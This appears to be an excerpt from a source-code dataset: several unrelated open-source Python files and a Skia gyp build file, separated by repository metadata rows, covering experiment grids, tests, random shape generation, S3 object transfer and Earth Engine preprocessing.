# Make the list of all variants.
variants = self.variants()
# Print variant names for the user.
var_names = set([self.variant_name(var) for var in variants])
var_names = sorted(list(var_names))
line = '='*DIV_LINE_WIDTH
preparing = colorize('Preparing to run the following experiments...',
color='green', bold=True)
joined_var_names = '\n'.join(var_names)
announcement = f"\n{preparing}\n\n{joined_var_names}\n\n{line}"
print(announcement)
if WAIT_BEFORE_LAUNCH > 0:
delay_msg = colorize(dedent("""
Launch delayed to give you a few seconds to review your experiments.
To customize or disable this behavior, change WAIT_BEFORE_LAUNCH in
spinup/user_config.py.
"""), color='cyan', bold=True)+line
print(delay_msg)
wait, steps = WAIT_BEFORE_LAUNCH, 100
prog_bar = trange(steps, desc='Launching in...',
leave=False, ncols=DIV_LINE_WIDTH,
mininterval=0.25,
bar_format='{desc}: {bar}| {remaining} {elapsed}')
for _ in prog_bar:
time.sleep(wait/steps)
# Run the variants.
for var in variants:
exp_name = self.variant_name(var)
# Figure out what the thunk is.
if isinstance(thunk, str):
# Assume one of the variant parameters has the same
# name as the string you passed for thunk, and that
# variant[thunk] is a valid callable function.
thunk_ = var[thunk]
del var[thunk]
else:
# Assume thunk is given as a function.
thunk_ = thunk
call_experiment(exp_name, thunk_, num_cpu=num_cpu,
data_dir=data_dir, datestamp=datestamp, **var)
def test_eg():
eg = ExperimentGrid()
eg.add('test:a', [1,2,3], 'ta', True)
eg.add('test:b', [1,2,3])
eg.add('some', [4,5])
eg.add('why', [True,False])
eg.add('huh', 5)
eg.add('no', 6, in_name=True)
return eg.variants()
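# Hedged usage sketch (added, not part of the original module). The grid and
# parameter names below are illustrative; `my_train_fn` stands in for a
# user-supplied training function that accepts the gridded keyword arguments
# plus `seed` and `logger_kwargs` (which call_experiment injects).
if __name__ == '__main__':
    eg = ExperimentGrid(name='demo')
    eg.add('seed', [0, 10, 20])
    eg.add('steps_per_epoch', 4000, shorthand='steps')
    eg.add('pi_lr', [3e-4, 1e-3], shorthand='lr')
    eg.print()
    for variant in eg.variants():
        print(eg.variant_name(variant), variant)
    # To actually launch the experiments, pass a training function to run(),
    # e.g. eg.run(my_train_fn, num_cpu=1).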
| 35.38172
| 90
| 0.591906
|
55061520fa145c1d78ea8a4de832e39c43a273fc
| 1,956
|
py
|
Python
|
src/tests/audition_tests/test_model_group_performance.py
|
josephbajor/triage_NN
|
cbaee6e5a06e597c91fec372717d89a2b5f34fa5
|
[
"MIT"
] | 160
|
2017-06-13T09:59:59.000Z
|
2022-03-21T22:00:35.000Z
|
src/tests/audition_tests/test_model_group_performance.py
|
josephbajor/triage_NN
|
cbaee6e5a06e597c91fec372717d89a2b5f34fa5
|
[
"MIT"
] | 803
|
2016-10-21T19:44:02.000Z
|
2022-03-29T00:02:33.000Z
|
src/tests/audition_tests/test_model_group_performance.py
|
josephbajor/triage_NN
|
cbaee6e5a06e597c91fec372717d89a2b5f34fa5
|
[
"MIT"
] | 59
|
2017-01-31T22:10:22.000Z
|
2022-03-19T12:35:03.000Z
|
from unittest.mock import patch
import numpy as np
import testing.postgresql
from sqlalchemy import create_engine
from triage.component.audition.model_group_performance import (
ModelGroupPerformancePlotter,
)
from .utils import create_sample_distance_table
def test_ModelGroupPerformancePlotter_generate_plot_data():
with testing.postgresql.Postgresql() as postgresql:
engine = create_engine(postgresql.url())
distance_table, model_groups = create_sample_distance_table(engine)
plotter = ModelGroupPerformancePlotter(distance_table)
df = plotter.generate_plot_data(
metric="precision@",
parameter="100_abs",
model_group_ids=[1, 2],
train_end_times=["2014-01-01", "2015-01-01"],
)
assert sorted(df["model_type"].unique()) == [
"best case",
"mySpikeClassifier",
"myStableClassifier",
]
for value in df[df["model_group_id"] == 1]["raw_value"].values:
assert np.isclose(value, 0.5)
def test_ModelGroupPerformancePlotter_plot_all():
with patch(
"triage.component.audition.model_group_performance.plot_cats"
) as plot_patch:
with testing.postgresql.Postgresql() as postgresql:
engine = create_engine(postgresql.url())
distance_table, model_groups = create_sample_distance_table(engine)
plotter = ModelGroupPerformancePlotter(distance_table)
plotter.plot_all(
[{"metric": "precision@", "parameter": "100_abs"}],
model_group_ids=[1, 2],
train_end_times=["2014-01-01", "2015-01-01"],
)
assert plot_patch.called
args, kwargs = plot_patch.call_args
assert "raw_value" in kwargs["frame"]
assert "train_end_time" in kwargs["frame"]
assert kwargs["x_col"] == "train_end_time"
assert kwargs["y_col"] == "raw_value"
| 36.90566
| 79
| 0.652863
|
58700c67e9ae604119edd594ee45b591c98cca0c
| 850
|
py
|
Python
|
esphomeyaml/components/switch/gpio.py
|
johnerikhalse/esphomeyaml
|
490743c26e3226f95181d00ded522b3f41372cb4
|
[
"MIT"
] | 1
|
2021-01-14T13:43:37.000Z
|
2021-01-14T13:43:37.000Z
|
esphomeyaml/components/switch/gpio.py
|
lobradov/esphomeyaml
|
27a77c685d30c1f113469d26d929d4ce9f1ed720
|
[
"MIT"
] | null | null | null |
esphomeyaml/components/switch/gpio.py
|
lobradov/esphomeyaml
|
27a77c685d30c1f113469d26d929d4ce9f1ed720
|
[
"MIT"
] | null | null | null |
import voluptuous as vol
import esphomeyaml.config_validation as cv
from esphomeyaml import pins
from esphomeyaml.components import switch
from esphomeyaml.const import CONF_MAKE_ID, CONF_NAME, CONF_PIN
from esphomeyaml.helpers import App, Application, gpio_output_pin_expression, variable
MakeGPIOSwitch = Application.MakeGPIOSwitch
PLATFORM_SCHEMA = cv.nameable(switch.SWITCH_PLATFORM_SCHEMA.extend({
cv.GenerateID(CONF_MAKE_ID): cv.declare_variable_id(MakeGPIOSwitch),
vol.Required(CONF_PIN): pins.gpio_output_pin_schema,
}))
def to_code(config):
pin = None
for pin in gpio_output_pin_expression(config[CONF_PIN]):
yield
rhs = App.make_gpio_switch(config[CONF_NAME], pin)
gpio = variable(config[CONF_MAKE_ID], rhs)
switch.setup_switch(gpio.Pswitch_, gpio.Pmqtt, config)
BUILD_FLAGS = '-DUSE_GPIO_SWITCH'
| 31.481481
| 86
| 0.794118
|
5aa87a7525d449eed0e505215ef36da477449b6b
| 2,595
|
py
|
Python
|
s3/replication/common/tests/system/s3_async_transfer_object.py
|
hessio/cortx-multisite
|
544cdef1a4cf08e97ca0757fcd9a32fbbc7b1997
|
[
"Apache-2.0"
] | 1
|
2022-01-13T12:26:30.000Z
|
2022-01-13T12:26:30.000Z
|
s3/replication/common/tests/system/s3_async_transfer_object.py
|
hessio/cortx-multisite
|
544cdef1a4cf08e97ca0757fcd9a32fbbc7b1997
|
[
"Apache-2.0"
] | null | null | null |
s3/replication/common/tests/system/s3_async_transfer_object.py
|
hessio/cortx-multisite
|
544cdef1a4cf08e97ca0757fcd9a32fbbc7b1997
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
#
# Copyright (c) 2021 Seagate Technology LLC and/or its Affiliates
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# For any questions about this software or licensing,
# please email opensource@seagate.com or cortx-questions@seagate.com.
#
import asyncio
from config import Config
import os
import sys
from s3replicationcommon.log import setup_logger
from s3replicationcommon.s3_site import S3Site
from s3replicationcommon.s3_session import S3Session
from s3replicationcommon.s3_get_object import S3AsyncGetObject
from s3replicationcommon.s3_put_object import S3AsyncPutObject
async def main():
config = Config()
# Setup logging and get logger
log_config_file = os.path.join(os.path.dirname(__file__),
'config', 'logger_config.yaml')
print("Using log config {}".format(log_config_file))
logger = setup_logger('client_tests', log_config_file)
if logger is None:
print("Failed to configure logging.\n")
sys.exit(-1)
s3_site = S3Site(config.endpoint, config.s3_service_name, config.s3_region)
session = S3Session(logger, s3_site, config.access_key, config.secret_key)
# Generate object names
source_object_name = config.object_name_prefix + "test"
target_object_name = config.object_name_prefix + "copy"
request_id = "dummy-request-id"
object_reader = S3AsyncGetObject(session, request_id,
config.source_bucket_name,
source_object_name, config.object_size,
config.range_read_offset, config.range_read_length)
object_writer = S3AsyncPutObject(session, request_id,
config.target_bucket_name,
target_object_name, config.object_size)
# Start transfer
await object_writer.send(object_reader, config.transfer_chunk_size)
logger.info("S3AsyncTransferObject test passed!")
await session.close()
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
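# Note (added): on Python 3.7+ the two lines above are usually written as the
# single call asyncio.run(main()), which creates and closes the event loop
# automatically; the explicit get_event_loop()/run_until_complete() form is
# kept here for compatibility with older interpreters.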
| 35.547945
| 88
| 0.7079
|
4e09886166af9089fff66a97ff1df96ee08e6a93
| 539
|
py
|
Python
|
aslprep/pybids/__init__.py
|
krmurtha/aslprep
|
5c00c2c9ad1daf93b056907596b7798ae8059efb
|
[
"BSD-3-Clause"
] | 2
|
2022-03-18T18:31:12.000Z
|
2022-03-18T18:31:26.000Z
|
aslprep/pybids/__init__.py
|
krmurtha/aslprep
|
5c00c2c9ad1daf93b056907596b7798ae8059efb
|
[
"BSD-3-Clause"
] | null | null | null |
aslprep/pybids/__init__.py
|
krmurtha/aslprep
|
5c00c2c9ad1daf93b056907596b7798ae8059efb
|
[
"BSD-3-Clause"
] | 1
|
2020-04-13T20:04:21.000Z
|
2020-04-13T20:04:21.000Z
|
from .due import due, Doi
from .layout import BIDSLayout
# For backwards compatibility
from bids_validator import BIDSValidator
__all__ = [
"analysis",
"BIDSLayout",
"BIDSValidator",
"config",
"layout",
"reports",
"utils",
"variables"
]
due.cite(Doi("10.1038/sdata.2016.44"),
description="Brain Imaging Data Structure",
tags=["reference-implementation"],
path='bids')
del due, Doi
from ._version import get_versions
__version__ = get_versions()['version']
del get_versions
| 17.966667
| 52
| 0.667904
|
ed2a36bce2a8202fda36f38cf1377e92e915378f
| 13,071
|
py
|
Python
|
skimage/draw/_random_shapes.py
|
thewtex/scikit-image
|
22bb6b94698b8889cbdf26b25d9e4fdb8b968d97
|
[
"BSD-3-Clause"
] | 1
|
2019-01-12T13:17:32.000Z
|
2019-01-12T13:17:32.000Z
|
skimage/draw/_random_shapes.py
|
thewtex/scikit-image
|
22bb6b94698b8889cbdf26b25d9e4fdb8b968d97
|
[
"BSD-3-Clause"
] | 30
|
2020-04-15T19:37:40.000Z
|
2020-04-22T21:19:35.000Z
|
skimage/draw/_random_shapes.py
|
thewtex/scikit-image
|
22bb6b94698b8889cbdf26b25d9e4fdb8b968d97
|
[
"BSD-3-Clause"
] | 2
|
2020-03-12T23:20:22.000Z
|
2021-02-15T21:54:02.000Z
|
import numpy as np
from . import polygon as draw_polygon, circle as draw_circle
from .._shared.utils import warn
def _generate_rectangle_mask(point, image, shape, random):
"""Generate a mask for a filled rectangle shape.
The height and width of the rectangle are generated randomly.
Parameters
----------
point : tuple
The row and column of the top left corner of the rectangle.
image : tuple
The height, width and depth of the image into which the shape is placed.
shape : tuple
The minimum and maximum size of the shape to fit.
random : np.random.RandomState
The random state to use for random sampling.
Raises
------
ArithmeticError
When a shape cannot be fit into the image with the given starting
coordinates. This usually means the image dimensions are too small or
shape dimensions too large.
Returns
-------
label : tuple
A (category, ((r0, r1), (c0, c1))) tuple specifying the category and
bounding box coordinates of the shape.
indices : 2-D array
A mask of indices that the shape fills.
"""
available_width = min(image[1] - point[1], shape[1])
if available_width < shape[0]:
raise ArithmeticError('cannot fit shape to image')
available_height = min(image[0] - point[0], shape[1])
if available_height < shape[0]:
raise ArithmeticError('cannot fit shape to image')
# Pick random widths and heights.
r = random.randint(shape[0], available_height + 1)
c = random.randint(shape[0], available_width + 1)
rectangle = draw_polygon([
point[0],
point[0] + r,
point[0] + r,
point[0],
], [
point[1],
point[1],
point[1] + c,
point[1] + c,
])
label = ('rectangle', ((point[0], point[0] + r), (point[1], point[1] + c)))
return rectangle, label
def _generate_circle_mask(point, image, shape, random):
"""Generate a mask for a filled circle shape.
The radius of the circle is generated randomly.
Parameters
----------
point : tuple
The row and column of the center of the circle.
image : tuple
The height, width and depth of the image into which the shape is placed.
shape : tuple
The minimum and maximum size and color of the shape to fit.
random : np.random.RandomState
The random state to use for random sampling.
Raises
------
ArithmeticError
When a shape cannot be fit into the image with the given starting
coordinates. This usually means the image dimensions are too small or
shape dimensions too large.
Returns
-------
label : tuple
A (category, ((r0, r1), (c0, c1))) tuple specifying the category and
bounding box coordinates of the shape.
indices : 2-D array
A mask of indices that the shape fills.
"""
if shape[0] == 1 or shape[1] == 1:
raise ValueError('size must be > 1 for circles')
min_radius = shape[0] / 2.0
max_radius = shape[1] / 2.0
left = point[1]
right = image[1] - point[1]
top = point[0]
bottom = image[0] - point[0]
available_radius = min(left, right, top, bottom, max_radius)
if available_radius < min_radius:
raise ArithmeticError('cannot fit shape to image')
radius = random.randint(min_radius, available_radius + 1)
circle = draw_circle(point[0], point[1], radius)
label = ('circle', ((point[0] - radius + 1, point[0] + radius),
(point[1] - radius + 1, point[1] + radius)))
return circle, label
def _generate_triangle_mask(point, image, shape, random):
"""Generate a mask for a filled equilateral triangle shape.
The length of the sides of the triangle is generated randomly.
Parameters
----------
point : tuple
The row and column of the top left corner of a down-pointing triangle.
image : tuple
The height, width and depth of the image into which the shape is placed.
shape : tuple
The minimum and maximum size and color of the shape to fit.
random : np.random.RandomState
The random state to use for random sampling.
Raises
------
ArithmeticError
When a shape cannot be fit into the image with the given starting
coordinates. This usually means the image dimensions are too small or
shape dimensions too large.
Returns
-------
label : tuple
A (category, ((r0, r1), (c0, c1))) tuple specifying the category and
bounding box coordinates of the shape.
indices : 2-D array
A mask of indices that the shape fills.
"""
if shape[0] == 1 or shape[1] == 1:
raise ValueError('dimension must be > 1 for triangles')
available_side = min(image[1] - point[1], point[0] + 1, shape[1])
if available_side < shape[0]:
raise ArithmeticError('cannot fit shape to image')
side = random.randint(shape[0], available_side + 1)
triangle_height = int(np.ceil(np.sqrt(3 / 4.0) * side))
triangle = draw_polygon([
point[0],
point[0] - triangle_height,
point[0],
], [
point[1],
point[1] + side // 2,
point[1] + side,
])
label = ('triangle', ((point[0] - triangle_height, point[0]),
(point[1], point[1] + side)))
return triangle, label
# Allows lookup by key as well as random selection.
SHAPE_GENERATORS = dict(
rectangle=_generate_rectangle_mask,
circle=_generate_circle_mask,
triangle=_generate_triangle_mask)
SHAPE_CHOICES = list(SHAPE_GENERATORS.values())
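# Illustrative note (added): a caller can either request a specific generator,
# e.g. SHAPE_GENERATORS['circle'], or let a NumPy RandomState pick one uniformly
# via random.choice(SHAPE_CHOICES), which is exactly what random_shapes() below
# does when `shape` is None.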
def _generate_random_colors(num_colors, num_channels, intensity_range, random):
"""Generate an array of random colors.
Parameters
----------
num_colors : int
Number of colors to generate.
num_channels : int
Number of elements representing color.
intensity_range : {tuple of tuples of ints, tuple of ints}, optional
The range of values to sample pixel values from. For grayscale images
the format is (min, max). For multichannel - ((min, max),) if the
ranges are equal across the channels, and
((min_0, max_0), ... (min_N, max_N)) if they differ.
random : np.random.RandomState
The random state to use for random sampling.
Raises
------
ValueError
When the `intensity_range` is not in the interval (0, 255).
Returns
-------
colors : array
An array of shape (num_colors, num_channels), where the values for
each channel are drawn from the corresponding `intensity_range`.
"""
if num_channels == 1:
intensity_range = (intensity_range, )
elif len(intensity_range) == 1:
intensity_range = intensity_range * num_channels
colors = [random.randint(r[0], r[1]+1, size=num_colors)
for r in intensity_range]
return np.transpose(colors)
def random_shapes(image_shape,
max_shapes,
min_shapes=1,
min_size=2,
max_size=None,
multichannel=True,
num_channels=3,
shape=None,
intensity_range=None,
allow_overlap=False,
num_trials=100,
random_seed=None):
"""Generate an image with random shapes, labeled with bounding boxes.
The image is populated with random shapes with random sizes, random
locations, and random colors, with or without overlap.
Shapes have random (row, col) starting coordinates and random sizes bounded
by `min_size` and `max_size`. It can occur that a randomly generated shape
will not fit the image at all. In that case, the algorithm will try again
with new starting coordinates a certain number of times. However, it also
means that some shapes may be skipped altogether. In that case, this
function will generate fewer shapes than requested.
Parameters
----------
image_shape : tuple
The number of rows and columns of the image to generate.
max_shapes : int
The maximum number of shapes to (attempt to) fit into the shape.
min_shapes : int, optional
The minimum number of shapes to (attempt to) fit into the shape.
min_size : int, optional
The minimum dimension of each shape to fit into the image.
max_size : int, optional
The maximum dimension of each shape to fit into the image.
multichannel : bool, optional
If True, the generated image has ``num_channels`` color channels,
otherwise generates grayscale image.
num_channels : int, optional
Number of channels in the generated image. If 1, generate monochrome
images, else color images with multiple channels. Ignored if
``multichannel`` is set to False.
shape : {rectangle, circle, triangle, None} str, optional
The name of the shape to generate or `None` to pick random ones.
intensity_range : {tuple of tuples of uint8, tuple of uint8}, optional
The range of values to sample pixel values from. For grayscale images
the format is (min, max). For multichannel - ((min, max),) if the
ranges are equal across the channels, and ((min_0, max_0), ... (min_N, max_N))
if they differ. As the function supports generation of uint8 arrays only,
the maximum range is (0, 255). If None, set to (0, 254) for each
channel reserving color of intensity = 255 for background.
allow_overlap : bool, optional
If `True`, allow shapes to overlap.
num_trials : int, optional
How often to attempt to fit a shape into the image before skipping it.
random_seed : int, optional
Seed to initialize the random number generator.
If `None`, a random seed from the operating system is used.
Returns
-------
image : uint8 array
An image with the fitted shapes.
labels : list
A list of labels, one per shape in the image. Each label is a
(category, ((r0, r1), (c0, c1))) tuple specifying the category and
bounding box coordinates of the shape.
Examples
--------
>>> import skimage.draw
>>> image, labels = skimage.draw.random_shapes((32, 32), max_shapes=3)
>>> image # doctest: +SKIP
array([
[[255, 255, 255],
[255, 255, 255],
[255, 255, 255],
...,
[255, 255, 255],
[255, 255, 255],
[255, 255, 255]]], dtype=uint8)
>>> labels # doctest: +SKIP
[('circle', ((22, 18), (25, 21))),
('triangle', ((5, 6), (13, 13)))]
"""
if min_size > image_shape[0] or min_size > image_shape[1]:
raise ValueError('Minimum dimension must be less than ncols and nrows')
max_size = max_size or max(image_shape[0], image_shape[1])
if not multichannel:
num_channels = 1
if intensity_range is None:
intensity_range = (0, 254) if num_channels == 1 else ((0, 254), )
else:
tmp = (intensity_range, ) if num_channels == 1 else intensity_range
for intensity_pair in tmp:
for intensity in intensity_pair:
if not (0 <= intensity <= 255):
msg = 'Intensity range must lie within (0, 255) interval'
raise ValueError(msg)
random = np.random.RandomState(random_seed)
user_shape = shape
image_shape = (image_shape[0], image_shape[1], num_channels)
image = np.ones(image_shape, dtype=np.uint8) * 255
filled = np.zeros(image_shape, dtype=bool)
labels = []
num_shapes = random.randint(min_shapes, max_shapes + 1)
colors = _generate_random_colors(num_shapes, num_channels,
intensity_range, random)
for shape_idx in range(num_shapes):
if user_shape is None:
shape_generator = random.choice(SHAPE_CHOICES)
else:
shape_generator = SHAPE_GENERATORS[user_shape]
shape = (min_size, max_size)
for _ in range(num_trials):
# Pick start coordinates.
column = random.randint(image_shape[1])
row = random.randint(image_shape[0])
point = (row, column)
try:
indices, label = shape_generator(point, image_shape, shape,
random)
except ArithmeticError:
# Couldn't fit the shape, skip it.
continue
# Check if there is an overlap where the mask is nonzero.
if allow_overlap or not filled[indices].any():
image[indices] = colors[shape_idx]
filled[indices] = True
labels.append(label)
break
else:
warn('Could not fit any shapes to image, '
'consider reducing the minimum dimension')
if not multichannel:
image = np.squeeze(image, axis=2)
return image, labels
| 36.819718
| 86
| 0.620764
|
e103d4313ed170e05b2038c665a4e481787eb33e
| 951
|
py
|
Python
|
S1/TP6/ex1.py
|
HerbeMalveillante/ecole
|
bebbc73cd678c58c9cd40389ea1cf229a0200308
|
[
"MIT"
] | null | null | null |
S1/TP6/ex1.py
|
HerbeMalveillante/ecole
|
bebbc73cd678c58c9cd40389ea1cf229a0200308
|
[
"MIT"
] | null | null | null |
S1/TP6/ex1.py
|
HerbeMalveillante/ecole
|
bebbc73cd678c58c9cd40389ea1cf229a0200308
|
[
"MIT"
] | null | null | null |
from time import time
from random import randint
def comp():
for m in range(5, 25):
debut = time()
print(sum([n ** 2 for n in range(2 ** m)]))
print(m, ":", time() - debut)
# the code takes longer and longer to execute as m increases.
def tri_bulle(liste_entree):
liste = liste_entree[:]
n = len(liste)
for j in range(1, n):
for i in range(n - j):
if liste[i] > liste[i + 1]:
liste[i], liste[i + 1] = liste[i + 1], liste[i]
return liste
def compare_tris():
for m in range(5, 25):
debut = time()
liste = [randint(0, 1000) for i in range(2 ** m)]
sorted(liste)
print(m, " (tri python) :", time() - debut)
debut = time()
tri_bulle(liste)
print(m, " (tri bulle) : ", time() - debut)
compare_tris()
# we can see that Python's built-in sort function is far faster than bubble sort.
| 23.775
| 64
| 0.542587
|
efefe625607ceaa7ad5f7cefe124bff7f588b9e0
| 2,022
|
py
|
Python
|
repoxplorer/tests/test_yamlbackend.py
|
morucci2/repoxplorer
|
640455bfa22cc344146644d4e0d72cb6c1e7ba48
|
[
"Apache-2.0"
] | null | null | null |
repoxplorer/tests/test_yamlbackend.py
|
morucci2/repoxplorer
|
640455bfa22cc344146644d4e0d72cb6c1e7ba48
|
[
"Apache-2.0"
] | null | null | null |
repoxplorer/tests/test_yamlbackend.py
|
morucci2/repoxplorer
|
640455bfa22cc344146644d4e0d72cb6c1e7ba48
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2017, Red Hat
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import shutil
import tempfile
from unittest import TestCase
from repoxplorer.index.yamlbackend import YAMLBackend
class TestYAMLBackend(TestCase):
def setUp(self):
pass
def tearDown(self):
if os.path.isdir(self.db):
shutil.rmtree(self.db)
def create_db(self, files):
self.db = tempfile.mkdtemp()
for filename, content in files.items():
with open(os.path.join(self.db, filename), 'w+') as f: f.write(content)
def test_yamlbackend_load(self):
f1 = """
---
key: value
"""
f2 = """
---
key2: value2
"""
files = {'f1.yaml': f1, 'f2.yaml': f2}
self.create_db(files)
backend = YAMLBackend(db_path=self.db)
backend.load_db()
default_data, data = backend.get_data()
self.assertEqual(default_data, None)
self.assertEqual(len(data), 2)
def test_yamlbackend_load_with_default(self):
f1 = """
---
key: value
"""
f2 = """
---
key2: value2
"""
files = {'default.yaml': f1, 'f2.yaml': f2}
self.create_db(files)
backend = YAMLBackend(
db_path=self.db,
db_default_file=os.path.join(self.db, 'default.yaml'))
backend.load_db()
default_data, data = backend.get_data()
self.assertDictEqual(default_data, {'key': 'value'})
self.assertEqual(len(data), 1)
self.assertDictEqual(data[0], {'key2': 'value2'})
| 27.324324
| 75
| 0.638971
|
66089e34ff0088d41585376c9776b24fb823a595
| 1,502
|
gyp
|
Python
|
gyp/sfnt.gyp
|
coltorchen/android-skia
|
91bb0c6f4224715ab78e3f64ba471a42d5d5a307
|
[
"BSD-3-Clause"
] | 2
|
2017-05-19T08:53:12.000Z
|
2017-08-28T11:59:26.000Z
|
gyp/sfnt.gyp
|
coltorchen/android-skia
|
91bb0c6f4224715ab78e3f64ba471a42d5d5a307
|
[
"BSD-3-Clause"
] | 2
|
2017-07-25T09:37:22.000Z
|
2017-08-04T07:18:56.000Z
|
gyp/sfnt.gyp
|
coltorchen/android-skia
|
91bb0c6f4224715ab78e3f64ba471a42d5d5a307
|
[
"BSD-3-Clause"
] | 2
|
2017-08-09T09:03:23.000Z
|
2020-05-26T09:14:49.000Z
|
{
'targets': [
{
'target_name': 'sfnt',
'product_name': 'skia_sfnt',
'type': 'static_library',
'standalone_static_library': 1,
'dependencies': [
'core.gyp:core',
],
'include_dirs': [
'../src/sfnt',
],
'sources': [
'../src/sfnt/SkIBMFamilyClass.h',
'../src/sfnt/SkOTTableTypes.h',
'../src/sfnt/SkOTTable_glyf.h',
'../src/sfnt/SkOTTable_head.h',
'../src/sfnt/SkOTTable_hhea.h',
'../src/sfnt/SkOTTable_loca.h',
'../src/sfnt/SkOTTable_maxp.h',
'../src/sfnt/SkOTTable_maxp_CFF.h',
'../src/sfnt/SkOTTable_maxp_TT.h',
'../src/sfnt/SkOTTable_name.h',
'../src/sfnt/SkOTTable_OS_2.h',
'../src/sfnt/SkOTTable_OS_2_V0.h',
'../src/sfnt/SkOTTable_OS_2_V1.h',
'../src/sfnt/SkOTTable_OS_2_V2.h',
'../src/sfnt/SkOTTable_OS_2_V3.h',
'../src/sfnt/SkOTTable_OS_2_V4.h',
'../src/sfnt/SkOTTable_OS_2_VA.h',
'../src/sfnt/SkOTTable_post.h',
'../src/sfnt/SkPanose.h',
'../src/sfnt/SkOTUtils.h',
'../src/sfnt/SkPreprocessorSeq.h',
'../src/sfnt/SkSFNTHeader.h',
'../src/sfnt/SkTypedEnum.h',
'../src/sfnt/SkOTUtils.cpp',
],
'direct_dependent_settings': {
'include_dirs': [
'../src/sfnt',
],
},
},
],
}
# Local Variables:
# tab-width:2
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=2 shiftwidth=2:
| 27.309091
| 44
| 0.52996
|
01f8289c8f94e10ff000dbc3597f1e83c6dd8d73
| 11,551
|
py
|
Python
|
Notebooks/0-TFRecords/preprocess/ee_data_preprocess.py
|
ikerey/Deep-Learning-with-TensorFlow2-Keras
|
865b07b445e45122c62434fe853d422a95cfe07a
|
[
"MIT"
] | null | null | null |
Notebooks/0-TFRecords/preprocess/ee_data_preprocess.py
|
ikerey/Deep-Learning-with-TensorFlow2-Keras
|
865b07b445e45122c62434fe853d422a95cfe07a
|
[
"MIT"
] | null | null | null |
Notebooks/0-TFRecords/preprocess/ee_data_preprocess.py
|
ikerey/Deep-Learning-with-TensorFlow2-Keras
|
865b07b445e45122c62434fe853d422a95cfe07a
|
[
"MIT"
] | null | null | null |
import ee
import time
import json
import folium
from shapely.geometry import shape
from . import ee_collection_specifics
from .utils import Polygons_to_MultiPolygon, GeoJSONs_to_FeatureCollections, get_geojson_string, check_status_data
class Preprocess(object):
"""
Training of Deep Learning models in Skydipper
----------
privatekey_path: string
A string specifying the direction of a json keyfile on your local filesystem
e.g. "/Users/me/.privateKeys/key_with_bucket_permissions.json"
"""
def __init__(self):
#import env files & services auth
self.ee_tiles = 'https://earthengine.googleapis.com/map/{mapid}/{{z}}/{{x}}/{{y}}?token={token}'
def composite(self, slugs=["Landsat-8-Surface-Reflectance"], init_date='2017-01-01', end_date='2017-12-31', lat=39.31, lon=0.302, zoom=6):
"""
Returns a folium map with the composites.
Parameters
----------
slugs: list
A list of dataset slugs to display on the map.
init_date: string
Initial date of the composite.
end_date: string
Last date of the composite.
lat: float
A latitude to focus the map on.
lon: float
A longitude to focus the map on.
zoom: int
A z-level for the map.
"""
self.slugs = slugs
self.init_date = init_date
self.end_date= end_date
self.lat = lat
self.lon = lon
self.zoom = zoom
map = folium.Map(
location=[self.lat, self.lon],
zoom_start=self.zoom,
tiles='OpenStreetMap',
detect_retina=True,
prefer_canvas=True
)
composites = []
for n, slug in enumerate(self.slugs):
composites.append(ee_collection_specifics.Composite(slug)(init_date, end_date))
mapid = composites[n].getMapId(ee_collection_specifics.vizz_params_rgb(slug))
folium.TileLayer(
tiles=mapid['tile_fetcher'].url_format,
attr='Google Earth Engine',
overlay=True,
name=slug).add_to(map)
self.composites = composites
map.add_child(folium.LayerControl())
return map
def select_areas(self, attributes, zoom=6):
"""Create the geometries from which we will export the data.
----------
attributes: list
List of geojsons with the training, validation, and testing polygons.
zoom: int
A z-level for the map.
"""
# Get MultiPolygon geostore object
self.multi_polygon = Polygons_to_MultiPolygon(attributes)
nFeatures = len(self.multi_polygon.get('geojson').get('features'))
self.nPolygons = {}
for n in range(nFeatures):
multipoly_type = self.multi_polygon.get('geojson').get('features')[n].get('properties').get('name')
self.nPolygons[multipoly_type] = len(self.multi_polygon.get('geojson').get('features')[n].get('geometry').get('coordinates'))
for multipoly_type in self.nPolygons.keys():
print(f'Number of {multipoly_type} polygons:', self.nPolygons[multipoly_type])
# Returns a folium map with the polygons
features = self.multi_polygon['geojson']['features']
if len(features) > 0:
shapely_geometry = [shape(feature['geometry']) for feature in features]
else:
shapely_geometry = None
self.centroid = list(shapely_geometry[0].centroid.coords)[0][::-1]
map = folium.Map(location=self.centroid, zoom_start=zoom)
if hasattr(self, 'composites'):
for n, slug in enumerate(self.slugs):
mapid = self.composites[n].getMapId(ee_collection_specifics.vizz_params_rgb(slug))
folium.TileLayer(
tiles=mapid['tile_fetcher'].url_format,
attr='Google Earth Engine',
overlay=True,
name=slug).add_to(map)
nFeatures = len(features)
colors = [['#FFFFFF', '#2BA4A0'],['#2BA4A0', '#FFE229'], ['#FFE229', '#FFFFFF']]
for n in range(nFeatures):
style_functions = [lambda x, color=color: {'fillOpacity': 0.0, 'weight': 4, 'color': color} for color in colors[n]]  # bind color per lambda (avoid late binding)
folium.GeoJson(data=get_geojson_string(features[n]['geometry']), style_function=style_functions[n],\
name=features[n].get('properties').get('name')).add_to(map)
map.add_child(folium.LayerControl())
return map
def stack_images(self, feature_collections):
"""
Stack the 2D images (input and output images of the Neural Network)
to create a single image from which samples can be taken
"""
for n, slug in enumerate(self.slugs):
# Stack RGB images
if n == 0:
self.image_stack = self.composites[n].visualize(**ee_collection_specifics.vizz_params_rgb(slug))
else:
#self.image_stack = ee.Image.cat([self.image_stack,self.composites[n].visualize(**ee_collection_specifics.vizz_params_rgb(slug))]).float()
self.image_stack = ee.Image.cat([self.image_stack,self.composites[n]]).float()
if self.kernel_size == 1:
self.base_names = ['training_pixels', 'test_pixels']
# Sample pixels
vector = self.image_stack.sample(region = feature_collections[0], scale = self.scale,\
numPixels=self.sample_size, tileScale=4, seed=999)
